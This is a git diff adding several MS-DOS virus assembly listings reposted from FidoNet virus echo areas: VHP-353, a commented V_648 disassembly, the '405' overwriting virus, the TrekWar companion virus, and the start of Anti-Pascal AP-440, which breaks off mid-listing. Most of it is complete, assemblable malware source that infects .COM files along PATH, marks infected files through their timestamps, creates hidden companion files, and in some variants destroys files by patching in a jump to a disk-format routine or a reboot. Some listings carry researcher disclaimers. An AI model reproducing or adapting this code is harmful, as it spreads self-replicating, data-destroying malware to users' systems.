+;* Area : VIRUS (Int: p p) +;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 17:49) +;* To : Adam Happ +;* Subj : V_VHP353.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org + page ,132 + name VHP_353 + title Virus; based on the famous VHP-648 virus + .radix 16 + +code segment + assume cs:code,ds:code + + org 100 + +environ equ 2C + +newjmp equ 7Bh ;Code of jmp instruction +codeptr equ 7A ;Here is formed a jump to the virus code +pname equ 78 ;Offset of file name in the dir path +poffs equ 76 ;Offset in the contents of the `PATH' variable +errhnd equ 74 ;Save place for the old error handler +fname equ 70 ;Path name to search for +mydta equ 2C ;DTA for Find First/Next: +attrib equ 17 ;File attribute +time equ 16 ;File time +date equ 14 ;File date +fsize equ 12 ;File size +namez equ 0E ;File name found + +start: + jmp short begin + nop + int 20 + +saveins db 3 dup (90) ;Original first 3 bytes + +begin: + call virus ;Detrmine the virus start address + +data label byte ;Data section + +allcom db '*.COM',0 ;Filespec to search for +pathstr db 'PATH=' + +;This replaces the first instruction of a destroyed file. +;It's a JMP instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,6,0,0,0C8 + +virus: + pop bx ;Make BX pointed at data + mov di,offset start ;Push the program true start address + push di ; onto the stack + push ax ;Save AX + + cld + lea si,[bx+saveins-data] ;Original instruction saved there + movsw ;Move 2 + 1 bytes + movsb + mov si,bx ;Keep SI pointed at data + + lea bp,[bx+endcode-data+7A] ;Reserve local storage + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + + mov [bp-errhnd],bx + mov [bp-errhnd+2],es + + mov ah,25 ;Set interrupt 24h handler + lea dx,[si+handler-data] + cmp al,0 ;DOS < 2.0 zeroes AL + je exit ;Exit if version < 2.0 + push ds + int 21 + + lea dx,[bp-mydta] + mov ax,1A00 ;Set DTA + int 21 + + xor di,di ;Point ES:DI at the environment start + mov es,ds:[di+environ] ;Environment address + mov bx,si +search: ;Search 'PATH' in the environment + lea si,[bx+pathstr-data] + mov cx,5 ;5 letters in 'PATH=' + repe cmpsb + je pfound ;PATH found, continue + mov ch,80 ;Maximum 32 K in environment + repne scasb ;If not, skip through next 0 + scasb ;End of environment? + dec di + jc search ;If not, retry +pfound: + pop es ;Restore ES + + mov [bp-poffs],di ;Save 'PATH' offset in poffs + lea di,[bp-fname] + mov [bp-pname],di + +filesrch: + lea si,[bx+allcom-data] + movsw + movsw ;Move '*.COM' at fname + movsw + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + lea dx,[bp-fname] + mov cl,11b ;Hidden, Read/Only or Normal files + jmp short findfile + +checkfile: + mov al,[bp-time] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + +;Is 10 <= file_size <= 64,000 bytes? + + sub word ptr [bp-fsize],10d + cmp [bp-fsize],64000d-10d+1 + jc process ;If so, process the file + +findnext: ;Otherwise find the next file + mov ah,4F ;Find next file +findfile: + int 21 + jnc checkfile ;If found, go chech some conditions + +nextdir: + mov si,[bp-poffs] ;Get the offset in the PATH variable + lea di,[bp-fname] ;Point ES:DI at fname + mov ds,ds:[environ] ;Point DS:SI at the PATH variable found + cmp byte ptr [si],0 ;0 means end of PATH + jnz cpydir + +olddta: + mov ax,2524 ;Set interrupt 24h handler + lds dx,dword ptr [bp-errhnd] + int 21 + push cs + pop ds ;Restore DS + +exit: + mov ah,1A ;Set DTA + mov dx,80 ;Restore DTA + int 21 + + pop ax + ret ;Go to CS:IP by doing funny RET + +cpydir: + lodsb ;Get a char from the PATH variable + cmp al,';' ;`;' means end of directory + je enddir + cmp al,0 ;0 means end of PATH variable + je enddir + stosb ;Put the char in fname + jmp cpydir ;Loop until done +enddir: + push cs + pop ds ;Restore DS + mov [bp-poffs],si ;Save the new offset in the PATH variable + mov al,'\' ;Add '\' + stosb + mov [bp-pname],di + jmp filesrch ;And go find the first *.COM file + +process: + mov di,dx ;[bp-pname] + lea si,[bp-namez] ;Point SI at namez +cpyname: + lodsb ;Copy name found to fname + stosb + cmp al,0 + jne cpyname + mov si,bx ;Restore SI + + mov ax,4301 ;Set file attributes + call clr_cx_dos + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jc oldattr ;Exit on error + mov bx,ax ;Save file handle in BX + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + jnz infect ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting the first instruction: + + mov cx,5 ;Write 5 bytes + lea dx,[si+bad_jmp-data] ;Write THESE bytes + jmp short do_write ;Do it + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +infect: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + lea dx,[si+saveins-data] ;Put them there + call dos_rw + jc oldtime ;Exit on error + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + call clr_dx_cx_dos + + mov [bp-codeptr],ax ;Save result in codeptr + + mov cx,endcode-saveins ;Virus code length as bytes to be written + lea dx,[si+saveins-data] ;Write from saveins to endcode + call dos_write ;Write to file handle + jc oldtime ;Exit on error + + call lseek ;LSEEK to the beginning of the file + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov cl,3 ;3 bytes to write + lea dx,[bp-newjmp] ;Write THESE bytes +do_write: + call dos_write ;Write to file handle + +oldtime: + mov dx,[bp-date] ;Restore file date + mov cx,[bp-time] ; and time + or cl,11111b ;Set seconds to 62 (the virus' marker) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[bp-attrib] ;They were saved in attrib + and cx,3F + lea dx,[bp-fname] + int 21 ;Do it + jmp olddta ;And exit + +lseek: + mov ax,4200 ;LSEEK from the beginning of the file +clr_dx_cx_dos: + xor dx,dx ;From the very beginning +clr_cx_dos: + xor cx,cx ;Auxiliary entry point + db 3Dh ;Trick +dos_write: + mov ah,40 ;Write to file handle +dos_rw: + int 21 + jc dos_ret ;Exit on error + cmp ax,cx ;Set CF if AX < CX +dos_ret: + ret + +handler: ;Critical error handler + mov al,0 ;Just ignore the error + iret ; and return + + db 0E9 ;The JMP opcode + +endcode label byte + +code ends + end start + +;-+- GoldED/386 2.50.B1016+ +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/t Suppress messages if successful assembly +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir53.asm b/MSDOS/Virus.MSDOS.Unknown.vir53.asm new file mode 100644 index 00000000..e70ebd8a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir53.asm @@ -0,0 +1,340 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 43 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : V_648.DIS +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Clif Jessop, 2:283/718 (06 Nov 94 17:50) +;* To : Edwin Cleton +;* Subj : V_648.DIS +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org +RET_NEAR_POP MACRO X +DB 0C2H +DW X +ENDM + +cseg segment + assume cs:cseg + org $+100h + +L0100: JMP L5BAA + + org 5baah + +L5BAA: PUSH CX + MOV DX,OFFSET L5DA3 + + CLD ;odtworzenie zmienionego kawalka + MOV SI,DX + ADD SI,0AH + MOV DI,OFFSET L0100 + MOV CX,3 + REPZ MOVSB + + MOV SI,DX ;baza obszaru danych + + MOV AH,30H ;Get MS-DOS version number + INT 21H + CMP AL,0 ;Major version number + JNZ L5BCA + JMP L5D91 + +L5BCA: PUSH ES + MOV AH,2FH ;Get DTA + INT 21H + MOV DS:[SI],BX ;schowanie starego DTA + MOV DS:[SI+2],ES + POP ES + + MOV DX,5FH ;nowe DTA + NOP + ADD DX,SI + MOV AH,1AH ;Set DTA + INT 21H + + PUSH ES ;<- szukanie PATH= + PUSH SI + MOV ES,DS:2CH ;Environment + MOV DI,0 ;adres w environmencie +L5BEB: POP SI + PUSH SI + ADD SI,1AH ;wzorzec PATH= + LODSB + MOV CX,8000h + REPNZ SCASB + MOV CX,4 +L5BFA: LODSB + SCASB + JNZ L5BEB ;-> to nie to + LOOP L5BFA + POP SI + POP ES + + MOV ds:[SI+16H],DI ;adres zawartosci path'a + MOV DI,SI + ADD DI,1FH ;obszar roboczy +; PATCH83 + MOV BX,SI + ADD SI,1FH ;obszar roboczy + MOV DI,SI + JMP SHORT L5C50 + +;<------zmiana katalogu +L5C16: CMP WORD PTR ds:[SI+16H],0 ;adres zawartosci path'a + JNZ L5C20 + JMP L5D83 + +L5C20: PUSH DS + PUSH SI + MOV DS,ES:2CH ;segment environmentu + MOV DI,SI + MOV SI,ES:[DI+16H] ;adres zawartosci path'a + ADD DI,1FH +; PATCH83 +L5C32: LODSB + CMP AL,';' ;czy koniec pozycji ? + JZ L5C41 + CMP AL,0 ;koniec environmentu + JZ L5C3E ;-> tak + STOSB + JMP SHORT L5C32 + +L5C3E: MOV SI,0 ;znacznik, ze wiecej juz nie ma +L5C41: POP BX + POP DS + MOV ds:[BX+16H],SI ;schowanie nowego pointera + CMP BYTE PTR [DI-1],'\' ;czy zakonczone back-slashem + JZ L5C50 ;-> tak + MOV AL,'\' ;uzupelnienie + STOSB + +L5C50: MOV ds:[BX+18H],DI ;adres poczatku nazwy zbioru w path + MOV SI,BX + ADD SI,10H ;'*.com' + MOV CX,6 + REPZ MOVSB + MOV SI,BX + MOV AH,4EH ;Find First File + MOV DX,1FH ;pointer na pathname + NOP + ADD DX,SI + MOV CX,3 ;Attrributes to match ro+hidden+zwykle + INT 21H + JMP SHORT L5C74 + +L5C70: MOV AH,4FH ;find next + INT 21H +L5C74: JNB L5C78 ;-> znaleziono + JMP SHORT L5C16 ;-> na nastepny katalog + +L5C78: MOV AX,ds:[SI+75H] ;Time file was last written + AND AL,1FH ;czy juz zawirusowany ? + CMP AL,1FH + JZ L5C70 ;-> tak, odpuszczamy takim + CMP WORD PTR ds:[SI+79H],0FA00h ;low word of file size + JA L5C70 ;-> odpuszczamy zbyt duzym + CMP WORD PTR ds:[SI+79H],0AH + JB L5C70 ;-> odpuszczamy zbyt malym + MOV DI,ds:[SI+18H] ;adres nazwy zbioru w path + + PUSH SI + ADD SI,7DH ;nazwa znalezionego zbioru +L5C9A: LODSB + STOSB + CMP AL,0 + JNZ L5C9A + POP SI + + MOV AX,4300h ;Get file attributes + MOV DX,1FH ;pathname + NOP + ADD DX,SI + INT 21H + MOV ds:[SI+8],CX ;Attribute byte + + MOV AX,4301h ;Set attributes + AND CX,0FFFEh ;-read/only + MOV DX,1FH ;pathname + NOP + ADD DX,SI + INT 21H + + MOV AX,3D02h ;Open file/write + MOV DX,1FH ;pathname + NOP + ADD DX,SI + INT 21H + JNB L5CCF + JMP L5D74 + +L5CCF: MOV BX,AX ;<- open O.K. + MOV AX,5700h ;Get date & time of file + INT 21H + MOV ds:[SI+4],CX ;schowanie daty ostatniej modyfikacji + MOV ds:[SI+6],DX + + MOV AH,2CH ;Get Time + INT 21H + + AND DH,7 ;ktory wariant ? + JNZ L5CF7 ;-> rozmnozenie + + ;<- destrukcja + MOV AH,40H ;Write handle + MOV CX,5 ;bytes + MOV DX,SI ;pointer to buffer + ADD DX,8AH + INT 21H + JMP SHORT L5D5B + + NOP ;<- rozmnozenie +L5CF7: MOV AH,3FH ;Read handle + MOV CX,3 ;bytes + MOV DX,0AH ;buffer offset + NOP + ADD DX,SI + INT 21H + JB L5D5B ;-> blad + CMP AX,3 ;bytes read + JNZ L5D5B ;zbyt malo + + MOV AX,4202h ;Move file pointer end+offset + MOV CX,0 ;offset + MOV DX,0 ;offset + INT 21H + JB L5D5B ;-> blad + MOV CX,AX ;adres konca + SUB AX,3 ;minus dlugosc jump'u + MOV ds:[SI+0EH],AX ;nowe 3 pierwsze bajty + ADD CX,02F9h + MOV DI,SI + SUB DI,01F7h + MOV [DI],CX ;<- adres zmiennych + MOV AH,40H ;write handle + MOV CX,0288h ;dlugosc wirusa + MOV DX,SI ;poczatek wirusa + SUB DX,01F9h + INT 21H + JB L5D5B ;-> blad + + CMP AX,0288h ;czy wszystko zapisano + JNZ L5D5B ;-> nie + MOV AX,4200 ;Move file pointer poczatek + MOV CX,0 ;offset + MOV DX,0 ;offset + INT 21H + JB L5D5B ;-> blad + + MOV AH,40H ;write + MOV CX,3 ;dlugosc + MOV DX,SI ;buffer + ADD DX,0DH + INT 21H +L5D5B: MOV DX,ds:[SI+6] ;koniec obrobki zbioru + MOV CX,ds:[SI+4] + AND CX,0FFE0h ;znacznik zawirusowania - czas + OR CX,1FH + MOV AX,5701h ;Set Date/Time of File + INT 21H + MOV AH,3EH ;Close handle + INT 21H + ;<- blad otwarcia zbioru +L5D74: MOV AX,4301h ;Set File attributes + MOV CX,ds:[SI+8] + MOV DX,1FH + NOP + ADD DX,SI + INT 21H + +L5D83: PUSH DS + MOV AH,1AH ;Set DTA + MOV DX,ds:[SI+0] ;poprzednia wartosc + MOV DS,ds:[SI+2] ;poprzednia wartosc + INT 21H + POP DS + +L5D91: POP CX ;<- gdy dos < 2.0 + XOR AX,AX + XOR BX,BX + XOR DX,DX + XOR SI,SI + MOV DI,0100h ;adres restartu + PUSH DI + XOR DI,DI + RET_NEAR_POP 0FFFFH + +L5DA3 label word ;<- poczatek zmiennych programu +x0000 equ $-l5da3 + dw 0080h,440Ch ;adres DTA oryginalny +x0004 equ $-l5da3 + Dw 6d60H ;Time file last written +x0006 equ $-l5da3 + Dw 0a67H ;Date file last written +x0008 dw 0020h ;file attribute - oryginal +x000a equ $-l5da3 + db 0E9h,0ADh,0Bh ;schowana poprzednia zawartosc [100h] +x000d equ $-l5da3 + db 0E9h,0A7h,5ah ;zapisywane do zbioru +x0010 equ $-l5da3 + DB '*.COM',0 ;wzorzec do szukania +x0016 equ $-l5da3 + dw 001CH ;adres path= w environmencie +x0018b equ $-l5da3 + dw 65F3H ;adres nazwy zbioru w path x001f +x001a equ $-l5da3 + db 'PATH=' ;szukane w environmencie +;--------------------------------------- +x001f equ $-l5da3 + db 'COMMAND.COM',0 ;nazwa obrabianego zbioru + db 'OM',0 + db 'M',0 + db 'COM',0 + db 'OM',0 + db ' ' + db ' ' + +;---------------------------------------- +x005f equ $-l5da3 ;<- nowe DTA + db 1,'????????COM',3,2 ;reserved area + db ?,? + DB 0,0,0,0,0,0,0 + db 20h ;attribute found +x0075 equ $-l5da3 + dw 6d60h ;Time file was last written + dw 0a67h ;date file was last written +x0079 equ $-l5da3 + Dw 5AAAH ;Low word of file size + Dw 0 ;High word of file size +x007d equ $-l5da3 + db 'COMMAND.COM',0,0 ;name and extension +;---------------------------------------- + +x008a equ $-l5da3 ;zapisywane do zbioru + db 0EAH,0F0H,0FFH,0,0F0H ;jmp 0f000:0fff0h + +cseg ENDS + + END L0100 + +;-+- DinoMail v.1.0 Alpha +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/Txx Specify output file type +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir54.asm b/MSDOS/Virus.MSDOS.Unknown.vir54.asm new file mode 100644 index 00000000..32709062 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir54.asm @@ -0,0 +1,238 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 44 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : 405_B.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Doug Bryce, 2:283/718 (06 Nov 94 17:51) +;* To : Mike Nisbett +;* Subj : 405_B.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org + title The '405' virus + page 65,132 +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The '405' Virus +; Disassembled by Joe Hirst, March 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The virus overwrites the first 405 bytes of a COM file. If the + ; length of the COM file is less than this, the length is increased + ; to 405 bytes. + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +BUFFER SEGMENT AT 0 + + ORG 295H +DW0295 DW ? +DB0297 DB ? + + ORG 0E000H +DWE000 DW ? ; Read buffer area + + ORG 0E195H +DWE195 DW ? ; Program after virus + +BUFFER ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:BUFFER + +VIRLEN EQU OFFSET ENDADR-START + ORG 100H + +START: XCHG SI,AX + ADD [BX+SI],AL + SAHF + ADD [BX+SI],AL + NOP + + MOV AX,0 ; Clear register + MOV ES:DB0249,AL ; Set current disk to default + MOV ES:DB024B,AL ; Set pathname store to zero + MOV ES:DB028B,AL ; Set number of drives to zero + PUSH AX + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB0249,AL ; Save current disk + MOV AH,47H ; Get current directory function + ADD AL,1 ; Next drive (A) + PUSH AX + MOV DL,AL ; Drive A + LEA SI,DB024B ; Pathname store + INT 21H ; DOS service + POP AX + MOV AH,0EH ; Select disk function + SUB AL,1 ; Convert drive for select function + MOV DL,AL ; Move drive + INT 21H ; DOS service + MOV ES:DB028B,AL ; Save number of drives +BP0139: MOV AL,ES:DB0249 ; Get current disk + CMP AL,0 ; Is drive A? + JNZ BP0152 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,2 ; Change drive to B + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive + JMP BP0179 + +BP0152: CMP AL,1 ; Is drive B? + JNZ BP0167 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,2 ; Change drive to C + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive + JMP BP0179 + +BP0167: CMP AL,2 ; Is drive C? + JNZ BP0179 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,0 ; Change drive to A + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive +BP0179: MOV AH,4EH ; Find first file function + MOV CX,1 ; Find read-only files, not system + LEA DX,DB028C ; Path '*.COM' + INT 21H ; DOS service + JB BP0189 ; Branch if error + JMP BP01A9 ; Process COM file + +BP0189: MOV AH,3BH ; Change current directory function + LEA DX,DB0297 ; Directory pathname (this is past the end) + INT 21H ; DOS service + MOV AH,4EH ; Find first file function + MOV CX,0011H ; Find directory and read-only + LEA DX,DB0292 ; Path '*' + INT 21H ; DOS service + JB BP0139 ; Branch if error + JMP BP0179 ; Find a COM file + +BP01A0: MOV AH,4FH ; Find next file function + INT 21H ; DOS service + JB BP0189 ; Branch if error + JMP BP01A9 ; Process COM file + + ; Process COM file + +BP01A9: MOV AH,3DH ; Open handle function + MOV AL,2 ; R/W access + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV BX,AX ; Move handle + MOV AH,3FH ; Read handle function + MOV CX,VIRLEN ; Length of virus + NOP + MOV DX,OFFSET DWE000 ; Read it in way down there + NOP + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV BX,DWE000 ; Get first word of COM file + CMP BX,9600H ; Is it infected? (should be 0096H) + JZ BP01A0 ; Yes, find another one + MOV AH,43H ; \ Get file attributes function + MOV AL,0 ; / + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV AH,43H ; \ Set file attributes function + MOV AL,1 ; / + AND CX,00FEH ; Set off read only attribute + INT 21H ; DOS service + MOV AH,3DH ; Open handle function + MOV AL,2 ; R/W mode + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV BX,AX ; Move handle + MOV AH,57H ; \ Get file date & time function + MOV AL,0 ; / + INT 21H ; DOS service + PUSH CX + PUSH DX + ASSUME ES:NOTHING + MOV DX,CS:DW0295 ; Get word after virus here + MOV CS:DWE195,DX ; Move to same position in prog + MOV DX,CS:DWE000+1 ; Get displacement from initial jump + LEA CX,DB0294-100H ; Length of virus minus one + SUB DX,CX + MOV CS:DW0295,DX ; Store in word after virus + MOV AH,40H ; Write handle function + MOV CX,VIRLEN ; Length of virus + NOP + LEA DX,START ; Beginning of virus + INT 21H ; DOS service + MOV AH,57H ; \ Set file date & time function + MOV AL,1 ; / + POP DX + POP CX + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV DX,CS:DWE195 ; Get word after virus + MOV CS:DW0295,DX ; Move to same position here + JMP BP0234 + +BP0234: MOV AH,0EH ; Select disk function + MOV DL,CS:DB0249 ; Get current disk + INT 21H ; DOS service + MOV AH,3BH ; Change current directory function + LEA DX,DB024A ; Address of path - this is incorrect + INT 21H ; DOS service + MOV AH,0 ; Terminate program function + INT 21H ; DOS service + +DB0249 DB 2 ; Current disk +DB024A DB 0 ; New current drive + + ; There should be an extra byte at this point containing '\' + ; for use by the change directory function - this is why that + ; function is pointing at the previous field + +DB024B DB 'TEST', 3CH DUP (0) +DB028B DB 0DH ; Number of drives +DB028C DB '*.COM', 0 +DB0292 DB '*', 0 +DB0294 DB 0E9H + +ENDADR EQU $ + +CODE ENDS + + END START + +;-+- FidoPCB v1.4 [NR] +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/uxxxx Set version emulation, version xxxx +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir55.asm b/MSDOS/Virus.MSDOS.Unknown.vir55.asm new file mode 100644 index 00000000..7abf77c3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir55.asm @@ -0,0 +1,213 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 45 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TREKWAR.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:51) +;* To : Daniel Hendry +;* Subj : TREKWAR.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org +;TrekWar +;Ŀ +; Assembly Source Listing for TrekWar Companion Virus +; Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) +;Ĵ +; The TrekWar is a simple modification of the Clonewar V2 companion virus; +; for all you trekkers out there... For those of you who, heaven forbid, do +; not know what the words below mean, they are the words to the old series +; opening music of Star Trek... +; + +CSEG SEGMENT + ASSUME CS:CSEG,DS:NOTHING + + ORG 100H + +START: + jmp VIR_BEGIN ;lets get moving... + + db "",13,10 + db "",13,10 + db "Beyond",13,10 ;blah blah blah + db "The rim of the star-light",13,10 + db "My love",13,10 + db "Is wand'ring in star-flight",13,10 + db "I know",13,10 + db "He'll find in star-clustered reaches",13,10 + db "Love",13,10 + db "Strange love a star woman teaches.",13,10 + db "I know",13,10 + db "His journey ends never",13,10 + db "His star trek",13,10 + db "Will go on forever.",13,10 + db "But tell him",13,10 + db "While he wanders his starry sea",13,10 + db "Remember, remember me." + db "",13,10 + db "",13,10 + + db "[TrekWar] " ;what the heck, its only a few bytes!? +WILDCARD DB "*.EXE",0 +FILE_EXT DB "COM",0 +FILE_FOUND DB 12 DUP(' '), 0 +FILE_CREATE DB 12 DUP(' '), 0 +SEARCH_ATTRIB DW 17H +NUM_INFECT DW 0 + + +My_Cmd: +CMD_LEN DB 13 +FILE_CLONE DB 12 DUP (' '), 0 + +; +; Read all the directory filenames and store as records in buffer. +; + +Vir_begin: + + mov sp,offset STACK_HERE ;move stack down + mov bx,sp + add bx,15 + mov cl,4 + shr bx,cl + mov ah,4ah ;deallocate rest of memory + int 21h + + mov di,OFFSET FILE_CLONE ;Point to buffer. + mov si,OFFSET FILE_FOUND + mov cx,12 + rep movsb + +Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search + mov cx,SEARCH_ATTRIB + + mov ah,4Eh ;find first matching file + int 21h + + jc EXIT ;If empty directory, exit + +; + +Store_name: + + mov di,OFFSET FILE_FOUND ;Point to buffer. + mov si,158 ;stow the file found in buffer + mov cx,12 + rep movsb + + mov di,OFFSET FILE_CREATE ;Point to buffer. + mov si,158 + mov cx,12 + rep movsb + + cld + mov di,OFFSET FILE_CREATE + mov al,'.' + mov cx,9 + repne scasb ;find the '.' + + mov si,OFFSET FILE_EXT + mov cx,3 + rep movsb ;replace the .EXE with .COM + ;from buffer + +; + +Check_file: ;does the file exist? + mov dx,OFFSET FILE_CREATE + xor cx,cx + mov ax,3d00h ;Open file, read only + int 21h + jnc find_next + +; +Infect_file: ;create companion routine + + mov dx,OFFSET FILE_CREATE ;contains name of "companion" + xor cx,cx + mov ah,3ch ;construct file + int 21h + jc EXIT + + ;Write virus to companion file + xchg bx,ax + mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length + mov dx,OFFSET START + mov ah,40h ;write to file function + int 21h ;do it + + ;Close file + mov ah,3eh ;assumes bx still has file handle + int 21h + + ;Change attributes + mov dx,OFFSET FILE_CREATE ;of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + jmp prepare_command + +; +;...findnext... +; +find_next: + mov ah, 4fh ;find next... + int 21h + jmp store_name +; +Prepare_command: + + cld + mov di,OFFSET FILE_CLONE + mov al,0 + mov cx,12 + repne scasb ;find the end of string \0 + + mov al,0Dh ; + stosb ;replace \0 with a + + mov ax,12 ;store length of the command + sub ax,cx + mov CMD_LEN, al + +; + +Exit: + ;Run the original program + mov si, OFFSET MY_CMD + int 2Eh ;Pass command to command + ;interpreter for execution + mov ax,4C00H ;Exit to DOS + int 21h + + +END_OF_CODE = $ + +STACK_HERE EQU END_OF_CODE + 512 + +CSEG ENDS + END START + +;-+- FMail 0.96 +; + Origin: ViRUS PaRk BbS >916< 387-6159 24HouRs (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir56.asm b/MSDOS/Virus.MSDOS.Unknown.vir56.asm new file mode 100644 index 00000000..b20e1976 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir56.asm @@ -0,0 +1,316 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 46 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : AP_440.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 17:54) +;* To : Mike Nisbett +;* Subj : AP_440.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org + page ,132 + name AP440 + title The 'Anti-Pascal' virus, version AP-440 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Anti-Pascal' Virus, version AP-440 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +v_const = 2042d + +start: + jmp v_entry + db 0CA ; Virus signature + + db (2048d - 9) dup (90) + + mov ax,4C00 + int 21 + +v_start label byte +first4 db 0E9, 0F8, 7, 90 +allcom db '*.COM', 0 + +mydta label byte +reserve db 15 dup (?) +attrib db ? +time dw ? +date dw ? +fsize dd ? +namez db 14d dup (?) + +allp 